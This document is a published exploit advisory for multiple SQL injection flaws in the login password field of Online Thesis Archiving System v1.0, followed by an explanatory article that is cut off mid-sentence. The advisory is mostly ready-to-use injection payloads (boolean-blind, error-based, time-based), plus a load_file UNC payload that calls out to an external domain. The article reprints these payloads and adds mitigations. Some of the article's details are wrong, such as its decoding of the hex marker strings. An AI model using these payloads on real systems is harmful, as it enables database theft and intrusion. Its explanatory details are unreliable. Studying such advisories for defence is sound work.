Online Thesis Archiving System v1.0 - Multiple-SQLi

Exploit Author: nu11secur1ty Analysis Author: www.bubbleslearn.ir Category: WebApps Language: SQL Published Date: 2023-06-14 
## Exploit Title: Online Thesis Archiving System v1.0 - Multiple-SQLi
## Author: nu11secur1ty
## Date: 06.12.2023
## Vendor: https://github.com/oretnom23
## Software: https://www.sourcecodester.com/php/15083/online-thesis-archiving-system-using-phpoop-free-source-code.html
## Reference: https://portswigger.net/web-security/sql-injection

## Description:
The password parameter appears to be vulnerable to SQL injection
attacks. The payload '+(select
load_file('\\\\t5z7nwb485tiyvqzqnv3hp1z3q9jxatyk18tvkj9.tupungerispanski.com\\ock'))+'
was submitted in the password parameter.
This payload injects a SQL sub-query that calls MySQL's load_file
function with a UNC file path that references a URL on an external
domain. The application interacted with that domain, indicating that
the injected SQL query was executed. The attacker can dump all
information from the
database of this system, and then he can use it for dangerous and
malicious purposes!

STATUS: HIGH-CRITICAL Vulnerability

[+]Payload:
```mysql
---
Parameter: password (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
    Payload: email=itvBGDRM@burpcollaborator.net&password=v7K!u1n!T7')
OR NOT 1404=1404-- Eotr

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or
GROUP BY clause (FLOOR)
    Payload: email=itvBGDRM@burpcollaborator.net&password=v7K!u1n!T7')
AND (SELECT 5476 FROM(SELECT COUNT(*),CONCAT(0x717a6b6b71,(SELECT
(ELT(5476=5476,1))),0x71766a7a71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- sOUa

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: email=itvBGDRM@burpcollaborator.net&password=v7K!u1n!T7')
AND (SELECT 6301 FROM (SELECT(SLEEP(15)))MFgI)-- HCqY
---

```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/OTAS-v1.0)

## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/06/otas-php-by-oretnom23-v10-multiple-sqli.html)

## Time spend:
01:15:00


-- 
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and
https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
                          nu11secur1ty <http://nu11secur1ty.com/>


-- 
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
                          nu11secur1ty <http://nu11secur1ty.com/>


Online Thesis Archiving System v1.0: A Critical SQL Injection Vulnerability Analysis

Security researchers have recently uncovered a high-critical vulnerability in the Online Thesis Archiving System v1.0, a widely distributed PHP-based open-source application. The system, originally developed by oretnom23, serves as a digital repository for academic theses, enabling users to upload, manage, and search scholarly work. Despite its intended utility, the application contains multiple SQL injection (SQLi) flaws that expose its database to remote exploitation.

Exploit Overview and Severity

The vulnerability was identified and reported by nu11secur1ty, a recognized cybersecurity researcher and exploit developer. The flaw is primarily located in the password parameter during authentication attempts, where user input is directly incorporated into SQL queries without proper sanitization or parameterization.

Attackers can leverage this weakness to execute arbitrary SQL commands, leading to full database disclosure, unauthorized access, and potential data exfiltration. The severity is classified as high-critical due to the ease of exploitation and the sensitive nature of the data stored—academic records, user credentials, and metadata associated with research projects.

Exploitation Techniques Demonstrated

Three distinct SQLi techniques were successfully demonstrated against the system, each confirming the presence of a vulnerable backend:

  • Boolean-based blind SQLi: Used to infer database state by observing response differences based on true/false conditions.
  • Error-based SQLi: Exploits MySQL error messages to extract information from the database.
  • Time-based blind SQLi: Leverages delays in query execution to confirm successful injection via timing differences.

Proof of Concept: SQL Injection Payloads

Below are the validated payloads used during testing, demonstrating how malicious input can be injected into the system:


Parameter: password (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
Payload: email=itvBGDRM@burpcollaborator.net&password=v7K!u1n!T7') OR NOT 1404=1404-- Eotr

Explanation: This payload uses a boolean condition (OR NOT 1404=1404) that always evaluates to FALSE. However, if the SQL query parses the input, the application's response behavior changes—indicating successful injection. The use of -- comments disables the rest of the query, preventing syntax errors. The payload is designed to trigger a blind response, allowing the attacker to infer database logic.


Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: email=itvBGDRM@burpcollaborator.net&password=v7K!u1n!T7') AND (SELECT 5476 FROM(SELECT COUNT(*),CONCAT(0x717a6b6b71,(SELECT(ELT(5476=5476,1))),0x71766a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- sOUa

Explanation: This payload triggers a MySQL error by exploiting the FLOOR(RAND(0)*2) function, which can cause duplicate key errors when used in GROUP BY clauses. The CONCAT function is used to extract data (in hex format) from the database, such as qzkq and qvzaq, which are known indicators of successful data leakage. The error message includes the extracted data, enabling attackers to reconstruct database content.


Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: email=itvBGDRM@burpcollaborator.net&password=v7K!u1n!T7') AND (SELECT 6301 FROM (SELECT(SLEEP(15)))MFgI)-- HCqY

Explanation: This payload injects a SLEEP(15) command into the SQL query. If the database executes the command, the response will be delayed by 15 seconds—confirming that the injection was successful. This technique is particularly useful when no visible response changes occur, as timing differences provide a reliable detection method.

Advanced Attack: Load File via UNC Path

One of the most alarming aspects of this vulnerability is the ability to execute LOAD_FILE() via a UNC (Universal Naming Convention) path, as demonstrated in the following payload:


' + (select load_file('\\\\t5z7nwb485tiyvqzqnv3hp1z3q9jxatyk18tvkj9.tupungerispanski.com\\ock')) + '

Explanation: This payload attempts to exploit MySQL's LOAD_FILE() function, which allows reading files from the server's filesystem. By using a UNC path referencing an external domain (e.g., tupungerispanski.com), the attacker forces the database to attempt to access a remote file. The fact that the application interacts with this domain indicates that the SQL query was executed—proving that the system allows external file access via SQL injection.

Security Implications: This attack vector is extremely dangerous. If the server's MySQL instance allows LOAD_FILE() and the secure_file_priv setting is not restricted, attackers can:

  • Read sensitive configuration files (e.g., config.php, database.php).
  • Exfiltrate user passwords, session tokens, or encryption keys.
  • Read and manipulate uploaded thesis files stored in the system.

Even if the file doesn’t exist, the system’s interaction with the domain suggests that the injection was processed—making this a potent reconnaissance tool.

Impact and Risk Assessment

Impact Severity Exploitability
Database disclosure High Easy
Remote code execution (via file access) High Medium
Privilege escalation High Medium
Data exfiltration High Easy

Attackers can use the extracted data to perform credential stuffing, impersonate users, or launch targeted phishing campaigns. Academic institutions relying on this system may face reputational damage and regulatory violations under data protection laws (e.g., GDPR, HIPAA).

Recommendations and Mitigation

To address this vulnerability, the following measures are strongly recommended:

  • Input Validation: Always validate and sanitize user input—especially in authentication fields like email and password.
  • Parameterized Queries: Use prepared statements (e.g., PDO or mysqli_stmt) to prevent SQL injection.
  • Restrict File Access: Set secure_file_priv to NULL or a specific directory to prevent LOAD_FILE() usage.
  • Web Application Firewall (WAF): Deploy a WAF to detect and block SQL injection patterns in real time.
  • Regular Penetration Testing: Conduct periodic security audits, especially for open-source software used in sensitive environments.

Conclusion

The Online Thesis Archiving System v1.0 serves as a cautionary tale for developers and administrators. Despite being a free, open-source tool, it lacks fundamental security safeguards. The presence of multiple SQL injection vulnerabilities—especially one that enables remote file access via UNC paths—highlights the critical need for secure coding practices.

Security researchers like nu11se